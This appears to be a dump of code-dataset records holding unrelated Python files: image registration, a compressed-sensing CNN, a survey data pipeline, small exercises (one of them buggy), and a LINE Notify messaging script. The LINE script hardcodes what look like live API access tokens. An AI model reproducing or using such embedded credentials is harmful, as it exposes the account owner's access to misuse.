message):\n\t\tself.log_list_field.insert(tk.END, message + '\\n')\n\t\tself.log_list_field.see(tk.END)\n\n\tdef add_account(self, account):\n\t\tself.accounts_file.write(account + '\\n')\n\t\tself.accounts_list_field.insert(tk.END, account + '\\n')\n\t\tself.accounts_list_field.see(tk.END)\n\nif __name__ == '__main__':\n\tfacade = Facade()\n\tfacade.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196952285","text":"import os, random\nimport io\nimport numpy as np\nfrom PIL import Image\n\n\nclass BlackBox():\n\n def __init__(self,shredded_path,orig_path):\n self.shredded_image=Image.open(shredded_path)\n self.original_image=Image.open(orig_path)\n self.blocks=self.create_blocks()\n\n def PIL2array(self,img):\n return np.array(img.getdata(),\n np.uint8).reshape(img.size[1], img.size[0],1)\n\n def array2PIL(self,arr, size):\n mode = 'L'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*np.ones((len(arr),1), np.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n\n\n def create_blocks(self): \n blocks=[] \n for i in range(1,129): \n blocks.append(list(range((i-1)*5,i*5))) \n return blocks \n\n\n def swap(self,indexes,matrix):\n permutation=[]\n for i in indexes:\n permutation.extend(self.blocks[i])\n return matrix[:,permutation]\n\n def evaluate_solution(self,permutation):\n if len(permutation) != len(self.blocks):\n raise Exception(\"Size of permutation list is wrong. It should be {0}\".format(len(self.blocks)))\n \n origin_matrix=self.PIL2array(self.original_image)\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n return np.sum(np.abs(np_matrix-origin_matrix))\n\n\n def show_solution(self,permutation, record=None):\n if not isinstance(permutation,list):\n raise Exception(\"You should provide a permutation list\")\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n new_image=self.array2PIL(np_matrix,self.original_image.size)\n if record is None:\n new_image.show()\n else:\n new_image.save(record)\n \n\n\n\n","sub_path":"blackbox.py","file_name":"blackbox.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386089093","text":"import argparse\n\nfrom core_data_modules.logging import Logger\nfrom core_data_modules.traced_data.io import TracedDataJsonIO\nfrom core_data_modules.util import IOUtils\n\nfrom src import LoadData, TranslateRapidProKeys, AutoCode, ProductionFile, \\\n ApplyManualCodes, AnalysisFile, WSCorrection\nfrom src.lib import PipelineConfiguration, MessageFilters\n\nlog = Logger(__name__)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Runs the post-fetch phase of the pipeline\")\n\n parser.add_argument(\"user\", help=\"User launching this program\")\n parser.add_argument(\"pipeline_run_mode\", help=\"whether to generate analysis files or not\",\n choices=[\"all-stages\", \"auto-code-only\"])\n parser.add_argument(\"pipeline_configuration_file_path\", metavar=\"pipeline-configuration-file\",\n help=\"Path to the pipeline configuration json file\")\n\n parser.add_argument(\"raw_data_dir\", metavar=\"raw-data-dir\",\n help=\"Path to a directory containing the raw data files exported by fetch_raw_data.py\")\n parser.add_argument(\"prev_coded_dir_path\", metavar=\"prev-coded-dir-path\",\n help=\"Directory containing Coda files generated by a previous run of this pipeline. \"\n \"New data will be appended to these files.\")\n\n parser.add_argument(\"auto_coding_json_output_path\", metavar=\"auto-coding-json-output-path\",\n help=\"Path to a JSON file to write the TracedData associated with auto-coding stage of the pipeline\")\n parser.add_argument(\"messages_json_output_path\", metavar=\"messages-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the messages analysis file\")\n parser.add_argument(\"individuals_json_output_path\", metavar=\"individuals-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the individuals analysis file\")\n parser.add_argument(\"icr_output_dir\", metavar=\"icr-output-dir\",\n help=\"Directory to write CSV files to, each containing 200 messages and message ids for use \" \n \"in inter-code reliability evaluation\"),\n parser.add_argument(\"coded_dir_path\", metavar=\"coded-dir-path\",\n help=\"Directory to write coded Coda files to\")\n parser.add_argument(\"csv_by_message_output_path\", metavar=\"csv-by-message-output-path\",\n help=\"Analysis dataset where messages are the unit for analysis (i.e. one message per row)\")\n parser.add_argument(\"csv_by_individual_output_path\", metavar=\"csv-by-individual-output-path\",\n help=\"Analysis dataset where respondents are the unit for analysis (i.e. one respondent \"\n \"per row, with all their messages joined into a single cell)\")\n parser.add_argument(\"production_csv_output_path\", metavar=\"production-csv-output-path\",\n help=\"Path to a CSV file to write raw message and demographic responses to, for use in \"\n \"radio show production\"),\n\n args = parser.parse_args()\n\n pipeline_run_mode = args.pipeline_run_mode\n user = args.user\n pipeline_configuration_file_path = args.pipeline_configuration_file_path\n\n raw_data_dir = args.raw_data_dir\n prev_coded_dir_path = args.prev_coded_dir_path\n\n auto_coding_json_output_path = args.auto_coding_json_output_path\n messages_json_output_path = args.messages_json_output_path\n individuals_json_output_path = args.individuals_json_output_path\n icr_output_dir = args.icr_output_dir\n coded_dir_path = args.coded_dir_path\n csv_by_message_output_path = args.csv_by_message_output_path\n csv_by_individual_output_path = args.csv_by_individual_output_path\n production_csv_output_path = args.production_csv_output_path\n\n # Load the pipeline configuration file\n log.info(\"Loading Pipeline Configuration File...\")\n with open(pipeline_configuration_file_path) as f:\n pipeline_configuration = PipelineConfiguration.from_configuration_file(f)\n Logger.set_project_name(pipeline_configuration.pipeline_name)\n log.debug(f\"Pipeline name is {pipeline_configuration.pipeline_name}\")\n\n log.info(\"Loading the raw data...\")\n data = LoadData.load_raw_data(user, raw_data_dir, pipeline_configuration)\n\n log.info(\"Translating Rapid Pro Keys...\")\n data = TranslateRapidProKeys.translate_rapid_pro_keys(user, data, pipeline_configuration)\n\n if pipeline_configuration.move_ws_messages:\n log.info(\"Pre-filtering empty message objects...\")\n # This is a performance optimisation to save execution time + memory when moving WS messages, by removing\n # the need to mark and process a high volume of empty message objects as 'NR' in WS correction.\n # Empty message objects represent flow runs where the participants never sent a message e.g. from an advert\n # flow run where we asked someone a question but didn't receive a response.\n data = MessageFilters.filter_empty_messages(data,\n [plan.raw_field for plan in PipelineConfiguration.RQA_CODING_PLANS])\n\n log.info(\"Moving WS messages...\")\n data = WSCorrection.move_wrong_scheme_messages(user, data, prev_coded_dir_path)\n else:\n log.info(\"Not moving WS messages (because the 'MoveWSMessages' key in the pipeline configuration \"\n \"json was set to 'false')\")\n\n log.info(\"Auto Coding...\")\n data = AutoCode.auto_code(user, data, pipeline_configuration, icr_output_dir, coded_dir_path)\n\n log.info(\"Exporting production CSV...\")\n data = ProductionFile.generate(data, production_csv_output_path)\n\n if pipeline_run_mode == \"all-stages\":\n log.info(\"Running post labelling pipeline stages...\")\n\n log.info(\"Applying Manual Codes from Coda...\")\n data = ApplyManualCodes.apply_manual_codes(user, data, prev_coded_dir_path)\n\n log.info(\"Generating CSVs for Analysis...\")\n messages_data, individuals_data = AnalysisFile.generate(user, data, csv_by_message_output_path,\n csv_by_individual_output_path)\n\n log.info(\"Writing messages TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(messages_json_output_path)\n with open(messages_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(messages_data, f)\n\n log.info(\"Writing individuals TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(individuals_json_output_path)\n with open(individuals_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(individuals_data, f)\n else:\n assert pipeline_run_mode == \"auto-code-only\", \"pipeline run mode must be either auto-code-only or all-stages\"\n log.info(\"Writing Auto-Coding TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(auto_coding_json_output_path)\n with open(auto_coding_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(data, f)\n\n log.info(\"Python script complete\")\n","sub_path":"generate_outputs.py","file_name":"generate_outputs.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"559632981","text":"#Given an integer array , output all the unique pairs that sum up to a specific value k\ndef pair_sum(array, k):\n if len(array) < 2:\n return print(\"Too small\")\n\n seen = ()\n output = ()\n\n for num in array:\n target = num - k\n\n if target not in seen:\n seen.add(num)\n\n else:\n output.add((min(num, target), max(num, target)))\n \n print(\"\\n\".join(map(str, list(output))))\n\npair_sum([1, 2, 3, 2], 4)","sub_path":"array_pair_sum.py","file_name":"array_pair_sum.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"614952501","text":"# Autor: Aline Paulette Villegas Berdejo\n# Descripcion: Texto que describe en pocas palabras el problema que estás resolviendo.\n\n# Escribe tu programa después de esta línea.\nm=int(input(\"Mujeres inscritas: \"))\nh=int(input(\"Hombres inscritos: \"))\n\nta=m+h\npm=(m*100)/ta\nph=(h*100)/ta\n\nprint(\"Total de inscritos: \", ta)\nprint(\"Porcentaje de mujeres: %.1f\" % pm,\"%\")\nprint(\"Porcentaje de hombre: %.1f\" % ph, \"%\")\n","sub_path":"clase.py","file_name":"clase.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356667266","text":"\"\"\"\r\nMedical Image Analysis (8DC00)\r\nProject Registration\r\nProject Group 20\r\nRebecca Küpper (1008070)\r\nMilan Pit (1025441)\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport registration as reg\r\nimport registration_util as util\r\nfrom IPython.display import display, clear_output\r\nfrom time import time\r\nimport sys\r\nimport os\r\n\r\n## new ##\r\nos.chdir('project')\r\n## --- ##\r\n\r\ndef chooseImage(filenumber, t1t2):\r\n \"\"\"\r\n Choose the right images according to the input\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n path_I: the path to the fixed image\r\n path_Im: the path to the moving image\r\n \"\"\"\r\n \r\n filelist = ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n \r\n #Assures that the input is right\r\n assert (filenumber in filelist), \"Invalid input, filenumber has to be in {}\".format(filelist) \r\n assert (t1t2=='t1' or t1t2=='t2'), \"Invalid input, t1t2 has to be 't1' or 't2'\"\r\n\r\n \r\n #Picks images depending on input\r\n path_I = '../data/image_data/{}_t1.tif'.format(filenumber)\r\n\r\n if t1t2 == 't1':\r\n path_Im = '../data/image_data/{}_t1_d.tif'.format(filenumber)\r\n else:\r\n path_Im = '../data/image_data/{}_t2.tif'.format(filenumber)\r\n \r\n return path_I, path_Im\r\n\r\ndef pointBasedRegistration(filenumber='3_3',t1t2='t1'):\r\n \"\"\"\r\n Perform point-based registration on two images\r\n This can be between T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n Im_t - transformed moving image T(Im)\r\n E_reg - registration error\r\n \"\"\"\r\n \r\n #Chooses images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Selects points for registration\r\n X, Xm = util.my_cpselect(path_I, path_Im)\r\n\r\n #Makes transformation matrix for registration depending on selected points and applies to the image\r\n T = reg.ls_affine(X,Xm)\r\n Im_t, Xt = reg.image_transform(Im, T)\r\n \r\n #Selects points for registration error\r\n X_ev, X_ev_m = util.my_cpselect(path_I, path_Im)\r\n \r\n #Transforms evaluation points of moved image by inverse transformation matrix\r\n T_inv = np.linalg.inv(T)\r\n X_ev_h = util.c2h(np.array(X_ev_m)) \r\n \r\n #Computes registration error using average distance using Pythagoras\r\n n = len(X_ev[1])\r\n dist = 0\r\n \r\n X_ev_t = T_inv.dot(X_ev_h)\r\n for idx in range(0, n-1):\r\n dist = dist + np.sqrt((X_ev[0][idx] - X_ev_t[0][idx])**2 + (X_ev[1][idx] - X_ev_t[1][idx])**2)\r\n \r\n E_reg = dist / n\r\n \r\n print(E_reg)\r\n \r\n return Im_t, E_reg\r\n\r\ndef intensityBasedRegistration(affine=True, corr=True, iterations=250, mu=1e-3, t1t2='t1', filenumber='1_1'):\r\n \"\"\"\r\n This function is an application of intensity based image registration.\r\n It uses three available methods of intensity based registration:\r\n rigid correlation, affine correlation and affine mutual information.\r\n These functions calculate similarity between the two input images, which is used to register the images.\r\n\r\n The inputs are:\r\n affine (default=True): A boolean that determines whether the affine or rigid method is used.\r\n True means the affine method is used, False means the rigid method is used.\r\n corr (default=True): A boolean that determines whether the similarity is calculated using correlation or mutual information.\r\n True means that correlation is used, False means that mutual information is used. If affine=False, correlation will automatically be used.\r\n iterations (default=250): An integer that determines the amount of times the gradient ascent is updated.\r\n mu (default=1e-3): A float that determines the learning rate of the gradient ascent.\r\n\r\n The output is:\r\n A single image containing:\r\n The final registration; The parameters of the registration; The similarity curve of the two images.\r\n\r\n An example of a correct function call:\r\n intensityBasedRegistration(True, True, 50, 1e-2)\r\n \"\"\"\r\n\r\n #Sanitizes input\r\n iterations = int(iterations)\r\n \r\n # Choose images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Sets initial parameters and function based on input\r\n if(affine):\r\n x = np.array([0., 1., 1., 0., 0., 0., 0.])\r\n if(corr):\r\n fun = lambda x: reg.affine_corr(I, Im, x)\r\n else:\r\n fun = lambda x: reg.affine_mi(I, Im, x)\r\n else:\r\n x = np.array([0., 0., 0.])\r\n fun = lambda x: reg.rigid_corr(I, Im, x)\r\n\r\n similarity = np.full((iterations, 1), np.nan)\r\n\r\n fig = plt.figure(figsize=(20,10))\r\n\r\n # fixed and moving image, and parameters\r\n ax1 = fig.add_subplot(121)\r\n\r\n # fixed image\r\n im1 = ax1.imshow(I)\r\n \r\n # moving image\r\n im2 = ax1.imshow(I, alpha=0.7)\r\n \r\n #Shows parameters in image\r\n txt = ax1.text(0.3, 0.95,\r\n np.array2string(x, precision=5, floatmode='fixed'),\r\n bbox={'facecolor': 'white', 'alpha': 1, 'pad': 10},\r\n transform=ax1.transAxes)\r\n\r\n #Sets up similarity curve\r\n ax2 = fig.add_subplot(122, xlim=(0, iterations), ylim=(0, 1))\r\n\r\n learning_curve, = ax2.plot(range(1,iterations+1), similarity, lw=2)\r\n ax2.set_xlabel('Iteration')\r\n ax2.set_ylabel('Similarity (%s)' %(\"Correlation\"*(corr) + \"Mutual Information\"*(1-corr)))\r\n ax2.grid()\r\n\r\n # #Logging steps are calculated. Cannot be done easier,\r\n # #as it is not guaranteed that the amount of iterations is evenly divisible by 4\r\n # step1 = int(iterations/4-1)\r\n # step2 = int(iterations/2-1)\r\n # step3 = int(iterations*3/4-1)\r\n\r\n #Stores start time of gradient ascent\r\n start_time = time()\r\n \r\n #Applies gradient descent [iterations] times\r\n for k in np.arange(iterations):\r\n \r\n #Gradient is calculated and applied to the parameters\r\n g = reg.ngradient(fun, x)\r\n x += g*mu\r\n\r\n #Calls similarity function to calculate the similarity and transformed image\r\n S, Im_t, _ = fun(x)\r\n\r\n # #Logs time elapsed and estimated total time of the gradient ascent\r\n print(\"Iteration {:d}/{:d}, {:.2f}% done\".format(k+1, iterations, (k+1)/iterations * 100))\r\n # \r\n # if(k == 0 or k == step1 or k == step2 or k == step3):\r\n # print(\"Elapsed time: {:.1f} s\\nEstimated time: {:.1f} s\".format(\r\n # time()-start_time, (time()-start_time) * (iterations/(k+1))))\r\n # \r\n # elif(k+1==iterations):\r\n # print(\"Duration: {:.2f} s\".format(time()-start_time))\r\n \r\n #Updates moving image and parameters\r\n im2.set_data(Im_t)\r\n txt.set_text(np.array2string(x, precision=5, floatmode='fixed'))\r\n\r\n #Updates similarity curve\r\n similarity[k] = S\r\n learning_curve.set_ydata(similarity)\r\n\r\n #Logs end result of similarity\r\n print(\"Final similarity: %f\" %(S))\r\n\r\n #Shows final image and plot (required for non-jupyter python)\r\n # plt.show() \r\n filename = \"../plaatjes/{}__{}__9e5__250it.png\".format(t1t2, filenumber) \r\n plt.savefig(filename)\r\n return S\r\n\r\nif(__name__ == \"__main__\"): \r\n\r\n # Uncomment either point based registration or intensity based registration.\r\n \r\n images = ('1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3')\r\n t1t2 = 't2' \r\n \r\n ######################################################\r\n \r\n # Point based registration\r\n \r\n # pointBasedRegistration(t1t2,images[0])\r\n \r\n ######################################################\r\n \r\n # Intensity based registration\r\n \r\n aff = True\r\n corr = True\r\n it = 250\r\n mu = 9e-5\r\n \r\n S = []\r\n for i, image in enumerate(images):\r\n print(\"Processing image {} of {}.\".format(i+1, len(images)))\r\n S.append(intensityBasedRegistration(aff, corr, it, mu, image, t1t2))\r\n \r\n \r\n # Print results\r\n for j in range(len(S)):\r\n print(images[j]+': '+str(S[j]))\r\n \r\n #######################################################\r\n \r\n \r\n \r\n","sub_path":"project/registration_project.py","file_name":"registration_project.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"227667614","text":"def is_palindrome_num(num):\n if num == 0:\n return True\n elif num < 0:\n i = num * (-1)\n else:\n i = num\n num_list = []\n while i / 10 != 0:\n num_list.append(i % 10)\n i = i // 10\n is_palindrome = True\n l_idx = 0\n r_idx = len(num_list) - 1\n while r_idx > l_idx:\n if num_list[l_idx] != num_list[r_idx]:\n is_palindrome = False\n break\n r_idx -= 1\n l_idx += 1\n return is_palindrome\n\n\nprint(is_palindrome_num(0))\nmax_palindrome = -1\ns_cycle = False\nfor i in range(100, 1000):\n for j in range(100, 1000):\n mult = i * j\n is_pal = is_palindrome_num(mult)\n if is_pal and mult > max_palindrome:\n max_palindrome = mult\n\nprint(max_palindrome)","sub_path":"DedMokar/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506270088","text":"#!/usr/bin/env python\n__author__ = \"Mike Gavrilov\"\n__copyright__ = \"Copyright 2013\"\n__license__ = \"\"\n__version__ = \"0.5\"\n__email__ = \"gavrikster _ at _ gmail.com\"\n__status__ = \"Beta\"\n\n\nimport sys\nfrom PySide.QtGui import *\nfrom mainWindow import MainWindow\n\napp = QApplication(sys.argv)\n\nMAIN_WINDOW = MainWindow()\nMAIN_WINDOW.show()\nMAIN_WINDOW.on_tool_cm_press()\n\napp.exec_()\n\n","sub_path":"sqldumpGUI.py","file_name":"sqldumpGUI.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"78000192","text":"import math\n#diameter of jar = 10cm\n#height of jar = 16cm\n#circumference = 2πr\n#area of circle = πr²\n\npi = math.pi\njar_diameter = 10\njar_radius = 5\njar_height = 16\njar_base_area = pi*(jar_radius ** 2)\njar_volume_cm = jar_base_area * jar_height\nprint(jar_volume_cm)\n\ncookie_diameter = 6\ncookie_radius = 3\ncookie_height = 2\ncookie_base_area = pi*(cookie_radius ** 2)\ncookie_volume_cm = cookie_base_area * cookie_height\nprint(cookie_volume_cm)\n\nincrement = int(0)\n\ncookiefit = True\n\nwhile cookiefit == True:\n print(increment)\n if cookie_volume_cm > jar_volume_cm:\n cookiefit = False\n else:\n jar_volume_cm = jar_volume_cm - cookie_volume_cm\n increment = increment + 1\n\nprint(\"finished\")\n#MATHS\n#\n#math.pi\n#math.sqrt(2)\n#math.sqrt(-1)\n#math.sin(0)\n#math.sin(math.pi / 2)\n#math.log(1)\n#math.log(math.e)\n#\n#\n#\n#\n#\n#\n\n\n","sub_path":"jar.py","file_name":"jar.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55480363","text":"#pip\r\n# pip\r\nimport requests\r\n\r\n\r\n\r\ndef lineNotifyMessage(token='lkGIyFAxVcJcW9qswWggKzarqaTGQJu9QkqjksmcdKD', msg='Notify from LINE, HELLO WORLD'):\r\n headers = {\r\n \"Authorization\": \"Bearer \" + token,\r\n \"Content-Type\": \"application/x-www-form-urlencoded\"\r\n }\r\n\r\n payload = {'message': msg}\r\n r = requests.post(\"https://notify-api.line.me/api/notify\", headers=headers, params=payload)\r\n return r.status_code\r\n\r\n\r\n\r\n\r\ndef main():\r\n\r\n lineNotifyMessage(token='zqTJF3vTvJbTHwkmKs9J74PPdX8iuNwwM9ix8SGKGqG')\r\n\r\nif __name__ == '__main__':\r\n\r\n main()\r\n print('Complete!!!!!!!!!!')","sub_path":"line/line_notify_message.py","file_name":"line_notify_message.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"174964623","text":"import os\nimport cv2\nimport copy\nimport numpy as np\nimport tensorflow as tf\nfrom os import listdir\nfrom pathlib import Path\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nfrom sklearn.datasets import load_sample_image\nfrom sklearn.feature_extraction import image\n\nimport matplotlib.pyplot as plt\n\ndef create(pp, img, p):\n\n img_ = np.zeros((p, 128, 128, 1), dtype=np.float32)\n\n for i in range(len(img)):\n mask = np.random.choice([0, 1], size=(128, 128), p=[1-pp, pp])\n idx_w, idx_h = np.where(mask == 1)\n \n for j in range(len(idx_w)):\n img[i, idx_w[j],idx_h[j],0] = 0\n \n img_[i,:,:,0] = img[i,:,:,0]\n return img_\n\ndef curate(path, lt, x, y):\n \n cnt = 0\n for idx, j in tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n onlyfiles.remove('Thumbs.db')\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 8)\n \n y_patches = np.reshape(y_patches,(8, 128,128,-1))\n\n \n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 8)\n \n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef curate_(path, lt, x, y):\n\n cnt = 0\n for idx, j in tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 2)\n\n y_patches = np.reshape(y_patches,(2, 128,128,-1))\n\n\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 2)\n\n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef imgSave():\n \n x_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n y_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n\n data = Path('/workspace/storage/cnn-cs/data/test')\n lst = os.listdir(data)\n lst.sort()\n\n count = 0\n\n for _, i in enumerate(lst):\n p = join(data,i)\n img = cv2.imread(p, 0)\n\n y_patches = image.extract_patches_2d(img, (128, 128), max_patches = 1)\n y_patches = np.reshape(y_patches,(1, 128, 128,-1))\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.10, y_patch, 1)\n\n for k in range(len(x_patches)):\n x_[count] = x_patches[k]\n y_[count] = y_patches[k]\n count += 1\n\n x_ = x_ / 255.\n y_ = y_ / 255.\n\n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = x_[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)),cmap='gray')\n\n plt.savefig('/workspace/data/image_sparse.png')\n \n model = tf.keras.models.load_model('/workspace/data/cs-simple-model-1000.h5', compile =False)\n \n predict = model.predict(x_[:10,:,:,:])\n \n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = predict[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)), cmap='gray')\n\n plt.savefig('/workspace/data/image_recons.png')\n psnr_ = tf.image.psnr(y_[:10,:,:,:], predict, max_val=1.0)\n print(psnr_)\n\ndef printResult(X, Y):\n\n fig = plt.figure(figsize=(9, 4))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = X[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(img_x, cmap = 'gray')\n plt.show()\n return None \n\ndef saveResult():\n rows = 3\n cols = 3\n\n fig = plt.figure(figsize=(12,10))\n\n for i in range(1,rows+1):\n for j in range(1, cols+1):\n img = cv2.imread(os.path.join(os.getcwd(),onlyfewfiles[((i-1)*rows)+j - 1]), 0)\n patch = image.extract_patches_2d(img, (128,128), max_patches = 1)\n img = np.resize(patch,(128,128))\n ax = fig.add_subplot(rows, cols, ((i-1)*rows)+j)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('{}\\nNewline'.format(onlyfewfiles[((i-1)*rows)+j - 1]), fontsize=8)\n plt.imshow(img, cmap='gray')\n\n plt.show()\n\n return None\n\ndef convertModel(path):\n \n lst = [x for x in os.listdir(path) if os.path.isdir(os.path.join(path,x))]\n\n for idx, val in enumerate(lst):\n converter = tf.lite.TFLiteConverter.from_saved_model(path+'/'+val)\n tflite_model = converter.convert()\n with open('/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/'+val+'-model.tflite', 'wb') as f:\n f.write(tflite_model)\n return None\n\ndef extractWeights(path):\n \n model = tf.keras.models.load_model(path, compile=False)\n\n for layer in model.layers:\n if len(layer.weights) > 0:\n print(layer.name, layer.weights[0].shape)\n print(np.where(layer.weights[0] == 0))\n\n return None\n\nif __name__ == \"__main__\":\n\n '''\n count_n = 0\n IMG_WIDTH = 128\n IMG_HEIGHT = 128\n\n Path1 = Path('/workspace/storage/cnn-cs/data/images')\n Path2 = Path('/workspace/storage/cnn-cs/data/train')\n\n lst = [x for x in Path1.iterdir() if Path1.is_dir()]\n lst_ = [x for x in Path2.iterdir() if Path2.is_dir()] \n\n for i in range(len(lst)):\n count_n += len(os.listdir(os.path.join(Path1,lst[i]))) - 1\n \n x_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n y_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate(Path1, lst, x_train, y_train)\n\n count_n = 0\n\n for i in range(len(lst_)):\n count_n += len(os.listdir(os.path.join(Path2,lst_[i]))) \n\n X_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n Y_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate_(Path2, lst_, X_train, Y_train)\n \n\n convertModel()\n '''\n\n\n #p_hi = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/hi-model/cs-hi-model-500.h5'\n p_simple = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/simple-model/cs-simple-model-500.h5'\n p_sq = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/sq-model/cs-sq-model-500.h5'\n extractWeights(p_sq)\n","sub_path":"utils/utilities_new.py","file_name":"utilities_new.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"298539245","text":"from multiprocessing import Value\nimport numpy as np\nfrom pfb.opt import power_method, pcg, primal_dual\nfrom pfb.operators import PSF, DaskPSI\n\ndef grad_func(x, dirty, psfo):\n return psfo.convolve(x) - dirty\n\ndef sara(psf, model, residual, sig_21=1e-6, sigma_frac=0.5, \n mask=None, beam=None, dual=None, weights21=None, \n nthreads=1, maxit=10, gamma=0.99, tol=1e-3, # options for outer optimisation\n psi_levels=3, psi_basis=None, # sara dict options\n reweight_iters=None, reweight_alpha_ff=0.5, reweight_alpha_percent=10, # reweighting options\n pdtol=1e-6, pdmaxit=250, pdverbose=1, positivity=True, tidy=True, # primal dual options\n cgtol=1e-6, cgminit=25, cgmaxit=150, cgverbose=1, # conjugate gradient options\n pmtol=1e-5, pmmaxit=50, pmverbose=1): # power method options\n \n if len(residual.shape) > 3:\n raise ValueError(\"Residual must have shape (nband, nx, ny)\")\n \n nband, nx, ny = residual.shape\n\n if beam is None:\n beam = lambda x: x\n else:\n try:\n assert beam.shape == (nband, nx, ny)\n beam = lambda x: beam * x\n except:\n raise ValueError(\"Beam has incorrect shape\")\n\n if mask is None:\n mask = lambda x: x\n else:\n try:\n if mask.ndim == 2:\n assert mask.shape == (nx, ny)\n mask = lambda x: mask[None] * x\n elif mask.ndim == 